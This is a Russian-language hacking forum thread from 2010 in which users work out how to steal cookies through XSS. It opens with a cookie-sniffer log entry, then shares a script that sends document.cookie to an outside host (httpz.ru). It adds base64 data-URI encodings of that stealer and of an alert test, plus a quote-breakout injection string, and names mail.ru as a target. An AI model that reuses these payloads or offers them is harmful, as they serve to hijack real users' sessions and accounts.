09.03.2010 16:00:49 [] IP: 92.126.**.*** Real IP*: 92.126.**.***, 193.169.***.*** QUERY: cck_count=0; cck_lasttime=1**8***641*** REFERER: empty AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20***115 Firefox/3.6 (.NET CLR 3.5.3***9) и где тут куки???
вот именно, я подкидываю файл с таким содержанием <script> img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> И ГДЕ МОИ КУКИ????
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.
этот файл нужно не подкинуть, а сделать так, чтоб код PHP: <script> img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> чудесным образом был внедрён на сайт mail.ru (если тебя mail.ru интересует) механизм внедрения такого кода называется "XSS" Вот когда это условие будет выполнено - приступай к следующему этапу
вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOyBpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script> img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться
